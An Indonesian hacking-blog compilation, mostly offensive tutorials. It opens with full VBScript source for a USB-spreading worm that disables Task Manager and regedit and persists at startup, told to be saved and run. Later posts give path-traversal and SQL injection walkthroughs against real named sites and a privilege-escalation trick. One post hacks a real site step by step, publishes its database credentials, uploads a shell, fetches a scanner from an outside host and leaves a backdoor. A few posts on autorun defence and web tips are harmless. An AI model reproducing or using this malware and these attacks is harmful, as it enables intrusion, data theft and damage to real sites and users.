Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus”


on error resume next

Dim (pendeklarasian) kata-kata berikut ini”


dim rekursif,winpath,flashdrive,fs,mf,atr,tf,sina,nt,check,sd


Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information”


atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe sinaxxx.vbs"

set fs = createobject("Scripting.FileSystemObject")

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekursif = rekursif & text.readline

rekursif = rekursif & vbcrlf

loop

do


Menduplikasikan diri untuk menjadi file induk di Windows Path (example: C:\Windows)”


Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & "\SINAXXX.vbs")

tf.attributes = 32

set tf = fs.createtextfile(winpath & "\SINAXX.vbs",2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(winpath & "\SINAXXX.vbs")

tf.attributes = 39

“Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok dan Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket”


for each flashdrive in fs.drives


Perintah untuk mengeCek Drive”


If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then


membuat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\”


set tf = fs.getfile(flashdrive.path &"\SINAXXXa.vbs")

tf.attributes = 32

set tf = fs.createtextfile(flashdrive.path &"\SINAXXX.vbs",2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(flashdrive.path &"\SINAXXX.vbs")

tf.attributes = 39

“Membuat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)”


set tf = fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 32

set tf = fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)

tf.write atr

tf.close

set tf = fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 39

end if

next


Memanipulasi Registry”


set sina = createobject("WScript.Shell")


Ubah CAPTION Internet Explorer menjadi komputer Anda terinfeksi Vrs SINAXXX”


sina.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",”komputer Anda terinfeksi Vrs SINAXXX"


Set agar file hidden tidak ditampilkan di Explorer”


sina.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Advanced\Hidden", "1", "REG_DWORD"


Hilangkan menu Find, Folder Options, Run, LogOff, dan memblokir Regedit dan Task Manager”


sinaRegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFind”, “1
, “REG_DWORD”

sina.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFolderOptions”, “1
, “REG_DWORD”

sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoRun”, “1
, “REG_DWORD”

sina.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff", "0", "REG_DWORD"


sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”, “1
, “REG_DWORD”

sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1, “REG_DWORD”


Mendisablekan klik kanan”


sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoViewContextMenu”, “1
, “REG_DWORD”

Memunculkan Pesan Setiap Windows Startup”

sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“SINAXXX.”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“kami dari keluarga SINA memohon maaf atas virus SINAXXX !!!!”

Mengaktifkan virus sinaxxx.vbs setiap Windows Startup”


sina.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\SINAXXX.vbs “

“Menghilangkan menu Close”

sina.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", "0", "REG_DWORD"

”Mengubah RegisteredOwner dan Organization”


sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The SINAXXX”
sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”SINAXXX”

”Akhir dari Kode”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

untuk membuat Virus dari litsing diatas. kamu cukup meng-COPY Listing tersebut kedalam NOTPED dan kemudian

di SAVE dengan nama file yang berektensi vbs misal : sinaxxx.vbs.

PERLU DI PERHATKAN !!!!!

SETALAH KAMU COPY LISTING TSB JANGAN LUPA MENGHAPUS KOMENTARNYA ..YANG DI APIT TANDA ( “ ) KUTIP.!!!!

TERIMAKSIH ATAS PERHATIANNYA, KLW ADA KEKLIRUAN TOLONG KRITIK DAN SARAN’NYA

SELAMAT MENCOBA ……….!!!!!!!!

Membuat flashdisk aman dari autorun-nya si-virus

Oleh blckflcn

Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..



Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.



Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.


Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :





1)buka aplikasi notepad (tempat dimana kita akan menulis mantra)

2)tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.

3)langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).

4)lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)

5)lalu jalankan file mantra yang baru kita buat tersebut

6)buka explorer

7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.



Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.



Okeh… sekian saja info2 dan mantra2 yang saya jabarkan. (krn sdh tidak tahu lagi harus menjabarkan mantra yang mana ^-^)

PHP download script vulnerability

Oleh tomplixsee

Sebenarnya saya bingung mau memberi judul apa pada artikel ini. Maaf bila judulnya agak kurang pas dengan isi artikelnya

PHP adalah suatu bahasa pemrograman web yang cukup sakti yang kehandalannya tidak diragukan lagi. Tapi,adanya kesalahan dalam logika pemrograman php akan bisa berakibat fatal.

Salah satu contohnya adalah :

//download.php
header( "Content-Type: application/octet-stream" );
header( "Content-Length: " . filesize($_GET['file'] ) );
header( "Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file'] );
?>

Kode php diatas memiliki kelemahan yang fatal, dimana variabel “file” sama sekali tidak difilter, sehingga hacker akan bisa mendownload file apapun yang ada di server tersebut. Misalkan saja sang hacker mengakses alamat http://korban/download.php?file=../../../../../../etc/passwd maka file /etc/passwd milik server akan dikirimkan ke hacker.

Atau jika hacker mengakses alamat http://korban/download.php?file=download.php maka hacker akan mendapatkan source code dari file download.php.

Sedangkan untuk mencari korban bisa kita gunakan google, misalkan dengan syntax inurl:”download.php?file=” , atau inurl:”download.php?file=*.pdf” -intext:”download.php?file=*.pdf” atau yang lainnya.

Beberapa contoh situs yang vulnerable adalah:

http://www.mpbp.gov.my/download.php?file=download.php

http://elearning.mmu.edu.my/download.php?file=download.php

http://www.utem.edu.my/fkp/latihanIndustri/download.php?file=../../../../../../etc/passwd

http://www.moe.gov.my/pipp/download.php?filename=/../../../../../../etc/passwd

Adapun sedikit hal untuk pencegahan adalah:

1. lakukan pemfilteran terhadap inputan yang diterima dari user.
Misalkan pemfilteran terhadap karakter “../”, “”, atau type file yang boleh didownload.

2. lakukan pembatasan file access
3. berikan batasan, file di folder mana saja yang boleh didownload atau tidak
4. untuk menghindari googling, hindari penamaan script dengan nama “download.php” dan nama variabel dengan nama “file”.

terimakasih

Menjadi System Pada Windows XP

Oleh h04mc3kn


Pada artikel yang saya buat ini, awalnya ketika saya menggunakan deep freeze saya melihat betapa hebatnya deep freeze v.6 yang mengaku dirinya sebagai system, secara tidak sengaja terlintas difikiran saya bagaimana caranya menjadi system seperti deep freeze yang mengaku dirinya mempunyai privilege pada Windows XP. Ok tehniknya cukup sampai disini, langsung aja saya akan menunjukkan bagaimana caranya menjadi system pada Windows XP.

Langkah pertama :
* Jalankan Command Prompt (DOS)

* Ketikkan perintah at 20:33 /interactive "cmd.exe"
* Ketikkan perintah at untuk melihat schedule task yang aktif

* Setelah command prompt-nya bertambah satu, maka

* Jalankan Windows Task Manager dengan menekan tombol ctrl + alt + delete
* Klik tab PROCESSES
* Matikan EXPLORER

* Tutup Windows Task Manager-nya
* Pada DOS yang terakhir terbuka ketikkan : EXPLORER

* Selamat, sekarang anda telah menjadi SYSTEM pada Windows XP

Selamat Mencoba!!!

Curi Paksa File Video www.Liputan6.com

Step By Step:
1. Buka www.liputan6.com
2. pilih aja berita sesuka hati mu bos, misal aku pilih yg ini "12/05/2008 23:54
Ribuan Warga Duduki Gedung DPRD Riau "...kekek..
3. klik kanan di tolbar videonya--->> pilih copy link location "
kira-kira seperti ini "javascript:MM_openBrWindow('/mediaplayer/
?program=news&id=159302&m_id=718155','mediaplayer','scrollbars=no,resizable=no,width=540,height=680')"

4. "Ternyata pake Java Script "
Coba browsing ke http://liputan6.com//mediaplayer/?program=news&id=159302&m_id=718155
Nah.. dah mulai cerah kan
5. Sekarang klik kanan View Page source--->>
Perhatikan baris ini bos"

var s2 = new SWFObject("flvplayer.swf","playlist","480","380","7");
s2.addParam("wmode","transparent");
s2.addParam("allowScriptAccess", "always");
s2.addParam("allowfullscreen","true");
s2.addVariable("midroll", "386");
s2.addVariable("file","playlist.php%3Fprogram%3Dnews%26id%3D159302%26m_id%3D718155");
s2.addVariable("displayheight","360");
s2.addVariable("autostart","true");
s2.addVariable("repeat","list");
s2.addVariable("shuffle","false");
s2.addVariable("backcolor","0x000000");
s2.addVariable("frontcolor","0xCCCCCC");
s2.addVariable("lightcolor","0x557722");
s2.addVariable("enablejs", "true");
s2.write("player2");

Menurut kamu bos ada yg mencurigakan gak???
Betul bos.. 100% Betul
s2.addVariable("file","playlist.php%3Fprogram%3Dnews%26id%3D159302%26m_id%3D718155");
Mencurigakan
6. Nah link yg tadi kukasih yg ini "http://liputan6.com//mediaplayer/?program=news&id=159302&m_id=718155"
tambahin kata-kata playlist.php
Jadinya seperti ini
http://liputan6.com//mediaplayer/playlist.php?program=news&id=159302&m_id=718155

Nah coba browsing ke http://liputan6.com//mediaplayer/playlist.php?program=news&id=159302&m_id=718155
Apa yg muncul ???
keke.. nampak deh bagian dalamnya

This XML file does not appear to have any style information associated with it. The document tree is shown below.








Liputan6


http://static.liputan6.com/200805/080512ddemopetani.flv





Nah sekarang silahkan tinggal diDownload Filenya:
http://static.liputan6.com/200805/080512ddemopetani.flv

SQL Injection Step By Step For Dummy

 
Semuanya berawal karena gua ngeliat-liat semuanya pada rame masalah web attack...
Dalam hati gua hanya bisa berkata "MAMPUS GUA...GUA KAGAK NGERTI APA-APA SOAL BEGINIAN!!!"
Akhirnya gua liat-liat, baca-baca dan coba-coba tentunya, langsung dah dengan PD-nya nulis artikel kayak gini...

Hahahaha...Emang gua gak terlalu jago-jago amat tapi disini gua cuman mau sharing atau berbagi dari apa yang gua tau dan dapet. Sekarang gua akan menjelaskan bagaimana cara melakukan SQL Injection versi Pemula tentunya. Untuk yang dah jago banget diharapkan untuk tidak membaca.
Hehehe...Becanda kok, yang master dimohon tanggapannya supaya kalo ada kesalahan atau apapun itu gua bisa mengkoreksinya...

Tanpa basa basi langsung aja kita memulainya...



1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100


2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com
/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*


Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/
berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/
news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...Cari yang asik terus...Terserah Anda...

*/ Akhir kata...
Makasih buat perhatiannya...Kalo ada kesalahan mohon dimaafkan. Mungkin karena keterbatasan ilmu yang gw punya sekarang...Kalo ada tambahan silahkan...

*/Thanks Too
~ My Jesus Christ. My Everything, without YOU im Nothing
~ Om PIRUS, T0m dkk yang menjadi pedoman gw
~ Semua Jasakomers disini...You are my Inspirations...
Terutama Aurel666, Tomahawk, Kucing Black, Play, Pitaqh,Hadoitz, Neonmap, massmissile, Eva-00 dkk
~ Witha...I Love You So Much...

Dan semuanya yang dah membuat hidup gua lebih berarti...

Thursday, October 2, 2008

Download Listing Program & LP

LISING PROGRAM UNTUK SMESTER 3

A) Program Cobol (AP3) & C ++

1. Listing program pertemuan ke-1 klik disini.

2. Listing program pertemuan ke-2 dan LP klik disini.

3. Listing program pertemuan ke-3 klik disini

4. Listing program pertemuan ke-4 klik disini.

5. Listing program pertemuan ke-5 (Bahasa C) klik disini

6. Listing program pertemuan ke-6 (Bahasa C) klik disini

7. Listing program pertemuan ke-7 (Bahasa C) klik disini

8. Listing program pertemuan ke-8 (Bahasa C POINTER) klik disini




B) Progam Pascal (Struktur Data)


1. Listing program pertemuan ke-1 klik disini.

2. Listing program pertemuan ke-2 dan LP klik disini

3. Listing program pertemuan ke-3 klik disini

4. Listing program pertemuan ke-4 & LP klik disini

5. Listing program pertemuan ke-5 klik disini

6. Listing program pertemuan ke-6 klik disini

7. Listing program pertemuan ke-7 Shorting klik disini



LISTING PROGRAM UNTUK SMESTER 4


A) Program C ++ (PBO)

1. Listing program pertemuan ke-1 (Median-Modus-Mean) klik disini.

2. Listing program pertemuan ke- 2(Fakrorial-Permutasi-Combinasi) klik disini.

3. Listing program pertemuan ke- 3(Regresi) klik disini.

4. Listing program pertemuan ke- 4(Faktorial-Menu) klik disini.

5. Listing program pertemuan ke- 5(stream-Polimorpisem) klik disini.

6. Listing program pertemuan ke- 6(Swing-AWT) klik disini   New

Tuesday, July 1, 2008

Menampilkan status YM di Website


Menampilkan status YM (yahoo Messanger) di website kita sangatlah penting, terutama bagi website-website yang bergerak dalam bidang bisnis, gunanya ya sebagai CS (Customer Support), kalau untuk website community ya.. bisa sebagai tempat ngobrol dsb.

Cara membuat status YM di website kita sangatlah mudah sekali kita tinggal lah menambahkan tag HTML berikut:

<a href="ymsgr:sendIM?sinax89"><img src="http://opi.yahoo.com/online?u=sinax89&m=g&t=1" border=0></a>

Dimana: "sinax89" adalah ID Yahoo kamu, ID Yahoo dapat diperoleh jika anda mempunyai email di yahoo, jika tidak ... ya segera bikin saja email yahoo..
Ex: jika email yahoo kamu ibnu@yahoo.com, maka ID YM kamu adalah:  ibnu

Gimana mudah bukan ?
Artikel ini sudah kami kirimkan pada email2 anda (tentunya jika anda sudah langganan).

Menampilkan Favicon pada Website


Favicon adalah icon kecil yang ada di url address bar, bisa juga masuk dalam daftar bookmark jika kita mem bookmark suatu situs yang mempunyai Favicon, untuk ukurannya favicon sendiri adalah 16 x 16 pixel.

Berikut tutorial nya bagaimana cara membuat Logo pada URL Address Browser:
caranya siapkan icon favorite anda, download icon-icon dibawah ini:

http://www.webdeveloper.com/favicon.ico
http://www.oscmax.com/favicon.ico
http://www.coffeecup.com/favicon.ico
http://unblock-url.qarchive.org/favicon.ico
http://www.pizzahut.com/favicon.ico
http://www.starbucks.com/favicon.ico




Setelah itu silahkan klik kanan salah satu icon, lalu pilih Save Image As.. -> lalu save
Cara pemasangannya bisa anda Upload dan letakkan di direcrtory root  dengan nama: favicon.ico

atau bisa juga letakkan tag di bawah ini dalam header anda
<head>
....
<LINK REL="SHORTCUT ICON" HREF="http://www.yourwebsite.com/favicon.ico" />
</head>


Saturday, June 28, 2008

Menjadi System Pada Windows XP

Pada artikel yang saya buat ini, awalnya ketika saya menggunakan deep freeze saya melihat betapa hebatnya deep freeze v.6 yang mengaku dirinya sebagai system, secara tidak sengaja terlintas difikiran saya bagaimana caranya menjadi system seperti deep freeze yang mengaku dirinya mempunyai privilege pada Windows XP. Ok tehniknya cukup sampai disini, langsung aja saya akan menunjukkan bagaimana caranya menjadi system pada Windows XP.


Langkah pertama :


* Jalankan Command Prompt (DOS)

* Ketikkan perintah at 20:33 /interactive "cmd.exe"
* Ketikkan perintah at untuk melihat schedule task yang aktif

* Setelah command prompt-nya bertambah satu, maka

* Jalankan Windows Task Manager dengan menekan tombol ctrl + alt + delete
* Klik tab PROCESSES
* Matikan EXPLORER

* Tutup Windows Task Manager-nya
* Pada DOS yang terakhir terbuka ketikkan : EXPLORER

* Selamat, sekarang anda telah menjadi SYSTEM pada Windows XP

Selamat Mencoba!!!

Jasakom Attack

Untuk kali ini, saya ingin menunjukkan trik melakukan manipulasi data ke website Jasakom.com . Tools yang dibutuhkan ialah achilles atau bisa juga menggunakan addons firefox "tamper data" (Diajarin mas Rizki Wicaksono "Thank you"). Untuk tata cara penggunaan tools achilles bisa lihat disini "http://blog.360.yahoo.com/blog-faaDfjghaL.66FWYqQPtcpE3eg--?cq=1" (Mood == MaleZzZ).

Pada teknik Jasakom Attack 1 : Saya mencoba untuk memberikan nilai pada polling tanpa limit.
Pada teknik Jasakom Attack 2: Saya mencoba untuk memberikan komentar pada salah satu artikel "http://www.jasakom.com/index.php?categoryid=31&p2_articleid=628" di website Jasakom.com Dgn "USERNAME SIAPA SAJA" (Termasuk username admin).

Saya mendapatkan trik ini "Penggunaan Tools Achilles" dari buku mas S'to "http://www.jasakom.com/sto" yang berjudul Seni Internet Hacking ReCoded "http://www.jasakom.com/index.php?categoryid=15&p2_articleid=12". Jadi, bagi anda yg berminat lebih dalam lagi mempelajari teknik hacking ini silahkan beli bukunya di "http://www.jasakom.com/index.php?categoryid=15".

Saya mohon maaf yang sebesar- besarnya. Saya tidak menuliskan tata cara bagaimana melakukan manipulasi data terhadap website Jasakom.com. Alasannya sama seperti diatas (Mood == MaleZzZ).

Weitzzz...Jangan kecewa dulu. Anda tetap bisa menikmati teknik hacking ini, melalui video yang telah saya upload ke situs Youtube.com dan Indowebster.com.

Silahkan, lihat disini:
http://www.youtube.com/results?search_query=psychozetic&search_type=

Atau bisa download disini (Recomended):
http://www.indowebster.com/search.php?keyword=jasakom

Menembus Cpanel Situs Malaysia GerakBudaya.com

Ass wm wb...MERDEKA!!!!

Saya akan memberikan tutorial saya bagaimana menembus cpanel pada www.gerakbudaya.com, Mohon maaf jika tutorial ini agak panjang..karena saya mencoba membahas step-by-step

Awalnya saya mencari bugs fungsi get file, dan berharap semoga saja sang admin salah
mendeklarasikan fungsi, query, atau path-nya dengan cara googling keyword inurl:(fungsigetfile). Fungsi getfile disini adalah file php untuk memproses download file bisa berupa download.php, getfile.php, savefile.php, dseterusnya bisa kita kembangkan
sendiri kemungkinan2 yg ada. Bugs ini dapat menyebabkan kita bisa mendapatkan file2 php yg kita perlukan di dalam folder yg memiliki permission 777 atau 755


Seperti kita ketahui file php adalah file yang berisi bahasa pemrograman untuk memproses suat data, yang source codenya tidak bisa kita lihat langsung kecuali file php berada di dalam html

OK lanjut...

saya mendapatkan target: "www.gerakbudaya.com/store/download.php?filename="
ok jika menemukan target seperti ini test dulu apakah vurnerable atau tidak dengan cara tambahkan


pada string dibelakang file "download.php" sehinga url menjadi :
www.gerakbudaya.com/store/download.php?filename=download.php
jika berhasil mendownload file "download.php" bearti bugnya vurnerable dan bisa kita manfaatkan untuk
mengambil file2 php lainnya termasuk file php untuk proses login atau file php untuk menghubungkan ke database..

Pertama2 kita cari dulu page admin/login berada, caranya dengan mengira2 lokasi path adminnya (misal: /admin, /administrator, /login, /admin.php, /login.php, dst) atau bisa dengan "cgiscan"
Nah pada target ini saya menemukan pagenya di www.gerakbudaya.com/store/login.php (koq bisa nebak??
hehe kan udah ada linknya tinggal klik aja..;p) kalo login berupa form cari actionnya mengarah kemana
caranya mudah saja lihat source code dan cari kata2 action="", untuk target saya dapatkan diantara
script:

method="get">

Langkah selanjutnya download file "login.php" dengan memasukkan string pada bugs, sehingga url menjadi:
www.gerakbudaya.com/store/download.php?filename=login.php kemudian buka file "login.php" dengan notepad, cari
file prosesnya mengarah kemana..cari link file proses loginnya diantara kata2 includes atau required sebelum kata2 procces, untuk target saya dapatkan diantara script:
require('includes/application_top.php') --> artinya mengarah ke "/includes/application_top.php"
Download lagi file "/includes/application_top.php" dengan memasukkan string pada bugs, sehingga url
menjadi:
www.gerakbudaya.com/store/download.php?filename=includes/application_top.php

buka lagi file "aplication_top.php" dan cari lagi kata2 includes atau required, pada target saya
dapatkan :// include server parameters require('includes/configure.php');
---> artinya diproses oleh file "includes/configure.php"


Download file "includes/configure.php" tersebut dgn memasukkan string pada bugs, sehingga url menjadi:
www.gerakbudaya.com/store/download.php?filename=includes/configure.php
buka file tsb dan kita akan menemukan username database, password, dan database name. Pada target
saya temukan diantara script:
define('DB_SERVER_USERNAME', 'gerakbdy_geraksi');
define('DB_SERVER_PASSWORD', '79578342');
define('DB_DATABASE', 'gerakbdy_mainstore');


artinya:
database name=geraksi
database password=79578342
database username=gerakbdy_mainstore
username cpanel=gerakbdy
*catatan:username dan password digunakan pada database phpmyadmin bukan pada admin user dan admin
cpanel. okkk sampe sini istirahat dulu bentar, kalo udah lanjut lagi:

Control panel admin webmaster setahu saya ada dua jenis yaitu cpanel atau spanel, untuk login tinggal
menambah path /cpanel atau /spanel dibelakan domain..
untuk cpanel, login phpmyadmin terpadu didala cpanel sehingga kita masih harus login terlebih dahulu pada cpanel. Sedangkan pada spanel login filemanager dan phpmyadmin dipisahkan, sehingga kita bisa langsung masuk ke database phpmyadmin dgn
password dan username tadi tanpa harus login dulu ke panel admin..

Setelah saya mengecek whois domain, ternyata target menggunakan host civicbuilder.net yg menggunakan
cpanel11, skrg coba kita login ke cpanel-nya pada url:
www.gerakbudaya.com/cpanel ----> masukkan username
gerakbdy dan password kita coba dgn password database atau username database atau kata2 lain yg
kita dapatkan!!

*jika berhasil kita langsung dapat login ke filemanager


Kenapa pada password kita menggunakan pass db atau usrnm db, jawabannya simple karena psikologisnya,
admin webmaster biasanya tidak mau repot mengahapal sekian banyak password cpanel, database, webmail,
ftp, dl . Kalo belum berhasil login ke cpanel jgn gampang menyerah, kita coba dengan ftp, siapa tau kita bisa
masuk. Dengan cara berikut:
untuk tutorial ini penulis menggunakan mscmd pada

windows :
- buka cmd prompt ---> klik start->run->ketik "cmd"
- pada cmd prompt ketik "ftp gerakbudaya.com"
- kita akan ditanyakan username dan password, coba
masukkan pass dan usrnm db, siapa tau beruntung?
Dan ternyata anda benar " i'm login succesfully"




wuihhhhh..akhirnya
so selanjutnya apa?? yupz kita bisa langsung mengupload, mendownload, atau menghapus file, dll
perintah command ftp bisa kalian lihat di http://www.nsftools.com/tips/MSFTP.htm
Tapi gk seru ya kayaknya kalo gk dapet akses penuh ke cpanel..tenang ada caranya:
coba kita upload sebuah shell ke dalam server melaui ftp..
setalah berhasil buka file shell-nya dan set konfigurasi kalo udah login ke phpshell..masukkan file untuk scan password target (cari di google atau buat sendirilah...usaha yaaa),


caranya dengan perintah command linux:

"wget http://www.geocities.com/budak_dak_berez/scanpass.txt"
---> tanpa tanda kutip
kemudian rename file menjadi .php, caranya: ketik "mv scanpass.txt scanpass.php" ---> tanpa tanda kutip
ok sekarang coba jalankan file tersebut, dgn mengetikkan: "php scanpass.php" ---> tanpa tanda kutip
script akan scan semua user path yang memiliki config.php pada /home/ bukan /public_html/ atau wwwroot
gotchaaa...saya menemukan usrnm gerakbdy dengan pass 79578342

catatan: ini pun masih membutuhkan sebuah keberuntungan dengan shell ini saya pun berhasil mempertahankan
cpanel yg sempat diambil alih..namun setelah phpshel dan account ftp dihapus oleh webmaster saya hanya bisa gigit jari...;p
buat rekan yg lain yg mungkin bisa memanfaatkan dan mengembangkan celah ini..saya menanamkan sebuah bugs fungsi get file dgn url "www.gerakbudaya.com/bahaya.php?filename=" pass dan usrnm db telah diganti admin webmaster
menjadi:

username db: gerakbdy_geramm / geramm
password db:

Ok frenz lanjutkan perjuangan saya, karena saya mohon pamit dulu untuk mundur, segala yg mengatasnamakan budak^dak^berez pada aksi hacking, defacing, dll bukanlah saya yg melakukannya..
catatan terakhir: saya sangat sedih karena bugs ini banyak saya temukan pada situs2 indonesia, tolong di secure!!

Mohon maaf yg sebesar2nya jikalau ada kesalahan dan kekurangan pada tutorial ini, karena saya hanyalah manusia biasa

